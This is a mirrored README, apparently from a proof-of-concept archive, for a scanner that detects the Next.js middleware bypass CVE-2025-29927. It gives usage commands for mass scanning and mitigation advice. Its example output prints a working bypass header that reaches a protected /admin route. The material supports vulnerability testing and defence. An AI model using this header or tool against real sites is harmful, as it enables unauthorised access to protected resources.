关联漏洞
描述
Next.js Middleware Bypass Scanne
介绍
# CVE-2025-29927
## Next.js Middleware Bypass Scanner (CVE-2025-29927)
CVE-2025-29927 is a specialized security tool for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927) affecting Next.js versions 11.1.4 through 15.2.2. This critical vulnerability allows attackers to bypass security controls by sending a specially crafted HTTP header.
## About the Vulnerability
The Next.js middleware bypass vulnerability (CVE-2025-29927) allows attackers to circumvent authorization controls by sending a malicious `X-Middleware-Subrequest` header that confuses the middleware processing logic. This can lead to unauthorized access to protected resources and routes.
**CVSS Score:** 9.1 (Critical)
## Features
- Fast concurrent scanning of multiple targets
- SSL certificate verification bypass option for IP-based scanning
- Silent mode for automation and focused output
- Detailed vulnerability information (status codes, bypass headers)
- Endpoint discovery for comprehensive testing
## Installation
```bash
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
```
## Usage
```bash
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
```
### Command Line Arguments
- `-t, --target`: Single target to scan (e.g., example.com or https://example.com)
- `-f, --file`: File containing list of targets (one per line)
- `-c, --concurrency`: Number of concurrent scans (default: 5)
- `-k, --insecure`: Disable SSL certificate verification (useful for IP addresses)
- `-s, --silent`: Silent mode - only show vulnerable targets
### Examples
Scan a single target:
```bash
python CVE-2025-29927.py -t example.com
```
Scan multiple targets from a file:
```bash
python CVE-2025-29927.py -f targets.txt
```
Scan with SSL verification disabled:
```bash
python CVE-2025-29927.py -t 192.168.1.1 -k
```
Automated scanning with silent mode:
```bash
python CVE-2025-29927.py -f targets.txt -k -s
```
Scan with a custom Header:
```bash
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
```
## Output
For vulnerable targets, MiddleWay displays:
- The vulnerable endpoint
- Original status code
- Bypassed status code
- The bypass header used for successful exploitation
Example output:
```
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```
## Mitigation
To mitigate this vulnerability:
1. Upgrade to Next.js 14.2.25, 15.2.3 or later
2. If upgrading is not possible, block the `X-Middleware-Subrequest` header at your WAF or server level
## Disclaimer
This tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.
## License
MIT
文件快照
[4.0K] /data/pocs/538006495b78c43a07acbba493be1aecbc2a26e4
├── [7.4K] CVE-2025-29927.py
├── [3.0K] README.md
└── [ 60] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。